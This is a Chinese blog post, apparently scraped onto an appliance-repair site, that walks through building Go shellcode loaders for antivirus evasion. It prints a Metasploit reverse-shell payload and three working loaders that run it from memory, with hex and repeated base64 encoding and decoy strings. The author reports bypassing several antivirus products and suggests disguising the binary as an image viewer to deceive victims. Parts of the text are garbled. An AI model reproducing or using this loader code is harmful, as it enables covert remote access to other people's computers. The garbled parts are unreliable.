Go测试远控免杀学习
家电修理 2023-07-16 19:16www.caominkang.com电器维修
学了快一个月的 Go菜鸡也拿来瞎整一下,哈哈哈哈
虚拟机上下了一堆杀毒软件,免杀看了不少也来实验一下
实验环境
go version go1.18
msf 6.0.45-dev
in10
下面开整
先msf 生成一段 shellcode,具体什么意思百度了解一下
复制出来转换一下格式,x 换成 0x,逗号隔开
package main
import (
"os"
"syscall"
"unsafe"
)
const (
MEM_COMMIT = 0x1000
MEM_RESERVE = 0x2000
PAGE_EXECUTE_READWRITE = 0x40
)
var (
kernel32 = syscall.MustLoadDLL("kernel32.dll") //调用kernel32.dll
ntdll = syscall.MustLoadDLL("ntdll.dll") //调用ntdll.dll
VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") //使用kernel32.dll调用ViretualAlloc函数
RtlCopyMemory = ntdll.MustFindProc("RtlCopyMemory") //使用ntdll调用RtCopyMemory函数
shellcode_buf = []byte{
0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0x, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52,
0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52, 0x60, 0x51, 0x56, 0x48, 0x8b, 0x52, 0x18, 0x48,
0x8b, 0x52, 0x20, 0x48, 0x0f, 0xb7, 0x4a, 0x4a, 0x48, 0x8b, 0x72, 0x50, 0x4d, 0x31, 0xc9,
0x48, 0x31, 0xc0, 0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0x41, 0xc1, 0xc9, 0x0d, 0x41,
0x01, 0xc1, 0xe2, 0xed, 0x52, 0x48, 0x8b, 0x52, 0x20, 0x8b, 0x42, 0x3c, 0x48, 0x01, 0xd0,
0x41, 0x51, 0x66, 0x81, 0x78, 0x18, 0x0b, 0x02, 0x0f, 0x85, 0x72, 0x00, 0x00, 0x00, 0x8b,
0x80, 0x88, 0x00, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x67, 0x48, 0x01, 0xd0, 0x8b, 0x48,
0x18, 0x50, 0x44, 0x8b, 0x40, 0x20, 0x49, 0x01, 0xd0, 0xe3, 0x56, 0x48, 0xff, 0xc9, 0x4d,
0x31, 0xc9, 0x41, 0x8b, 0x34, 0x88, 0x48, 0x01, 0xd6, 0x48, 0x31, 0xc0, 0xac, 0x41, 0xc1,
0xc9, 0x0d, 0x41, 0x01, 0xc1, 0x38, 0xe0, 0x75, 0xf1, 0x4c, 0x03, 0x4c, 0x24, 0x08, 0x45,
0x39, 0xd1, 0x75, 0xd8, 0x58, 0x44, 0x8b, 0x40, 0x24, 0x49, 0x01, 0xd0, 0x66, 0x41, 0x8b,
0x0c, 0x48, 0x44, 0x8b, 0x40, 0x1c, 0x49, 0x01, 0xd0, 0x41, 0x8b, 0x04, 0x88, 0x41, 0x58,
0x48, 0x01, 0xd0, 0x41, 0x58, 0x5e, 0x59, 0x5a, 0x41, 0x58, 0x41, 0x59, 0x41, 0x5a, 0x48,
0x83, 0xec, 0x20, 0x41, 0x52, 0xff, 0xe0, 0x58, 0x41, 0x59, 0x5a, 0x48, 0x8b, 0x12, 0xe9,
0x4b, 0xff, 0xff, 0xff, 0x5d, 0x49, 0xbe, 0x77, 0x73, 0x32, 0x5f, 0x33, 0x32, 0x00, 0x00,
0x41, 0x56, 0x49, 0x89, 0xe6, 0x48, 0x81, 0xec, 0xa0, 0x01, 0x00, 0x00, 0x49, 0x89, 0xe5,
0x49, 0xbc, 0x02, 0x00, 0x0d, 0x05, 0xc0, 0xa8, 0x6e, 0x7f, 0x41, 0x54, 0x49, 0x89, 0xe4,
0x4c, 0x89, 0xf1, 0x41, 0xba, 0x4c, 0x77, 0x26, 0x07, 0xff, 0xd5, 0x4c, 0x89, 0xea, 0x68,
0x01, 0x01, 0x00, 0x00, 0x59, 0x41, 0xba, 0x29, 0x80, 0x6b, 0x00, 0xff, 0xd5, 0x6a, 0x0a,
0x41, 0x5e, 0x50, 0x50, 0x4d, 0x31, 0xc9, 0x4d, 0x31, 0xc0, 0x48, 0xff, 0xc0, 0x48, 0x89,
0xc2, 0x48, 0xff, 0xc0, 0x48, 0x89, 0xc1, 0x41, 0xba, 0xea, 0x0f, 0xdf, 0xe0, 0xff, 0xd5,
0x48, 0x89, 0xc7, 0x6a, 0x10, 0x41, 0x58, 0x4c, 0x89, 0xe2, 0x48, 0x89, 0xf9, 0x41, 0xba,
0x99, 0xa5, 0x74, 0x61, 0xff, 0xd5, 0x85, 0xc0, 0x74, 0x0a, 0x49, 0xff, 0xce, 0x75, 0xe5,
0xe8, 0x93, 0x00, 0x00, 0x00, 0x48, 0x83, 0xec, 0x10, 0x48, 0x89, 0xe2, 0x4d, 0x31, 0xc9,
0x6a, 0x04, 0x41, 0x58, 0x48, 0x89, 0xf9, 0x41, 0xba, 0x02, 0xd9, 0xc8, 0x5f, 0xff, 0xd5,
0x83, 0xf8, 0x00, 0x7e, 0x55, 0x48, 0x83, 0xc4, 0x20, 0x5e, 0x89, 0xf6, 0x6a, 0x40, 0x41,
0x59, 0x68, 0x00, 0x10, 0x00, 0x00, 0x41, 0x58, 0x48, 0x89, 0xf2, 0x48, 0x31, 0xc9, 0x41,
0xba, 0x58, 0xa4, 0x53, 0xe5, 0xff, 0xd5, 0x48, 0x89, 0xc3, 0x49, 0x89, 0xc7, 0x4d, 0x31,
0xc9, 0x49, 0x89, 0xf0, 0x48, 0x89, 0xda, 0x48, 0x89, 0xf9, 0x41, 0xba, 0x02, 0xd9, 0xc8,
0x5f, 0xff, 0xd5, 0x83, 0xf8, 0x00, 0x7d, 0x28, 0x58, 0x41, 0x57, 0x59, 0x68, 0x00, 0x40,
0x00, 0x00, 0x41, 0x58, 0x6a, 0x00, 0x5a, 0x41, 0xba, 0x0b, 0x2f, 0x0f, 0x30, 0xff, 0xd5,
0x57, 0x59, 0x41, 0xba, 0x75, 0x6e, 0x4d, 0x61, 0xff, 0xd5, 0x49, 0xff, 0xce, 0xe9, 0x3c,
0xff, 0xff, 0xff, 0x48, 0x01, 0xc3, 0x48, 0x29, 0xc6, 0x48, 0x85, 0xf6, 0x75, 0xb4, 0x41,
0xff, 0xe7, 0x58, 0x6a, 0x00, 0x59, 0x49, 0xc7, 0xc2, 0xf0, 0xb5, 0xa2, 0x56, 0xff, 0xd5,
}
)
func checkErr(err error) {
if err != nil { //如果内存调用出现错误,可以报出
if err.Error() != "The operation pleted suessfully." { //如果调用dll系统发出警告,程序运行成功,则不进行警报
println(err.Error())
os.Exit(1)
}
}
}
func main() {
shellcode := shellcode_buf
//调用VirtualAlloc为shellcode申请一块内存
addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
if addr == 0 {
checkErr(err)
}
//调用RtlCopyMemory来将shellcode加载进内存当中
_, _, err = RtlCopyMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode)))
checkErr(err)
//syscall来运行shellcode
syscall.Syscall(addr, 0, 0, 0, 0)
}
kernel32.dll 是一个很常见的DLL,它包含核心系统功能,如访问和操作内存、文件和硬件,几乎很多木马都会去调用这个函数 ntdll.dll 是Windos内核的接口。可执行文件通常不直接导入这个函数,而是由Kernel32.dll间接导入, 如果一个可执行文件导入了这个文件,这意味着作者企图使用Ntdll.dll 那些不是正常提供给Windos程序使用的函数。 一些如隐藏功能和操作进程等任务会使用这个接口
编译 go程序,go build demo.go
还可以做点手脚,比如去掉运行时的黑框 go build -ldflags="-H indosgui - -s" demo.go
甚至骚一点,可以让程序调用打开图片,让人以为这是一个打开图片的程序,放松警惕
好了,现在传到虚拟机上测试效果
1、indos defender
静态查杀没问题,现在试试运行,可以直接过,啊这
静态也是没问题,现在运行,同样很轻松
虽然被查出来了,上传上去并没有立刻报毒,所以如果受害者没有经常扫毒的习惯还是有机会的
比如我电脑就是养毒一堆马懒得管
刚传上去就报毒,然后给我自动删了,没得玩了
这里把0x 逗号 还有换行空格全部去掉,在加载时再恢复
package main
import (
"encoding/hex"
"fmt"
"io/ioutil"
"os"
"syscall"
"unsafe"
)
const (
MEM_COMMIT = 0x1000
MEM_RESERVE = 0x2000
PAGE_EXECUTE_READWRITE = 0x40
)
var (
kernel32 = syscall.MustLoadDLL("kernel32.dll")
ntdll = syscall.MustLoadDLL("ntdll.dll")
VirtualAlloc = kernel32.MustFindProc("VirtualAlloc")
RtlCopyMemory = ntdll.MustFindProc("RtlCopyMemory")
)
func Readcode() string {
f, err := ioutil.ReadFile("1.txt")
//为我们需要加载的shellcode文件,这里可以使用其他格式的文件来进行混淆
if err != nil {
fmt.Println("read fail", err)
}
return string(f)
}
func checkErr(err error) {
if err != nil {
if err.Error() != "The operation pleted suessfully." {
println(err.Error())
os.Exit(1)
}
}
}
func main() {
b := Readcode() // 加载shellcode
shellcode, err := hex.DecodeString(b)
if err != nil {
checkErr(err)
}
addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
if addr == 0 {
checkErr(err)
}
_, _, err = RtlCopyMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), (uintptr)(len(shellcode)))
checkErr(err)
syscall.Syscall(addr, 0, 0, 0, 0)
}
好吧,还是给火绒查出来了,试试360能不能查出来
还好,这次360没查出来,直接过了
在前面基础上改进,考虑可以把 shellcode多编码几次
在shellcode 载入内存前可以先载入一段没用的字符串到内存达到混淆的效果
shellcode 也可以分段载入到内存中
package main
import (
"encoding/base64"
"encoding/hex"
"fmt"
"io/ioutil"
"os"
"syscall"
"unsafe"
)
const (
MEM_COMMIT = 0x1000
MEM_RESERVE = 0x2000
PAGE_EXECUTE_READWRITE = 0x40
)
var (
kernel32 = syscall.MustLoadDLL("kernel32.dll")
ntdll = syscall.MustLoadDLL("ntdll.dll")
VirtualAlloc = kernel32.MustFindProc("VirtualAlloc")
RtlCopyMemory = ntdll.MustFindProc("RtlCopyMemory")
)
func checkErr(err error) {
if err != nil {
if err.Error() != "The operation pleted suessfully." {
println(err.Error())
os.Exit(1)
}
}
}
func Readcode() string {
f, err := ioutil.ReadFile("1.txt")
if err != nil {
fmt.Println("read fail", err)
}
return string(f)
}
func Base64DecodeString(str string) string {
resBytes, _ := base64.StdEncoding.DecodeString(str)
return string(resBytes)
}
func main() {
//内存加载shellcode前,先压入一段无关字符串用来混淆
var c string = "qeqdsfqeqqsqqeqdqdqdqeqrqeqQWRQW/.OPKDIJGIJWDOIAOSJIRGJOEKDOQIWOIJOGWEMPOSDPOOPGKWE[LWEPQKPOKEORKOPKPROKPOKOPQWKEPQOGOIMEKOMDMQWPODPOKOK3-021-04-34-3204O-02I059032JR0JI@JI3J3E02e"
//调用VirtualAllo申请一块内存
addr1, _, err := VirtualAlloc.Call(0, uintptr(len(c)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
//调用RtlCopyMemory加载进内存当中
_, _, err = RtlCopyMemory.Call(addr1, (uintptr)(unsafe.Pointer(&c)), uintptr(len(c)/2))
b := Readcode() // 加载 shellcode
deStrBytes := Base64DecodeString(b) // 6 次base64解码
for i := 0; i < 5; i++ {
deStrBytes = Base64DecodeString(deStrBytes)
}
shellcode, err := hex.DecodeString(deStrBytes)
addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
if addr == 0 {
checkErr(err)
}
_, _, err = RtlCopyMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode)/2))
_, _, err = RtlCopyMemory.Call(addr+uintptr(len(shellcode)/2), (uintptr)(unsafe.Pointer(&shellcode[len(shellcode)/2])), uintptr(len(shellcode)/2))
checkErr(err)
syscall.Syscall(addr, 0, 0, 0, 0)
}
Go的免杀效果确实很不错,这些常见的杀毒软件都是可以很轻松的就绕过了
还有就是,电脑装一堆杀毒软件互相打架真的害怕,电脑风扇不知道干啥呼呼没停过,
卡的一逼,开个文件还要等他转一会儿,我麻了啊
问个问题,女生的电脑是不是也是这样子的呢,至少2个杀毒软件
我啥也没干,90% 真不错
空调维修
- 温岭冰箱全国统一服务热线-全国统一人工【7X2
- 荆州速热热水器维修(荆州热水器维修)
- 昆山热水器故障码5ER-昆山热水器故障码26
- 温岭洗衣机24小时服务电话—(7X24小时)登记报
- 统帅热水器售后维修服务电话—— (7X24小时)登
- 阳江中央空调统一电话热线-阳江空调官方售后电
- 乌鲁木齐阳春燃气灶厂家服务热线
- 珠海许昌集成灶售后服务电话-全国统一人工【
- 乌鲁木齐中央空调维修服务专线-乌鲁木齐中央空
- 新沂热水器故障电话码维修-新沂热水器常见故障
- 诸城壁挂炉24小时服务热线电话
- 靖江空调24小时服务电话-——售后维修中心电话
- 空调室外滴水管维修(空调室外排水管维修)
- 九江壁挂炉400全国服务电话-(7X24小时)登记报修
- 热水器故障码f.22怎么解决-热水器f0故障解决方法
- 营口热水器售后维修服务电话—— 全国统一人工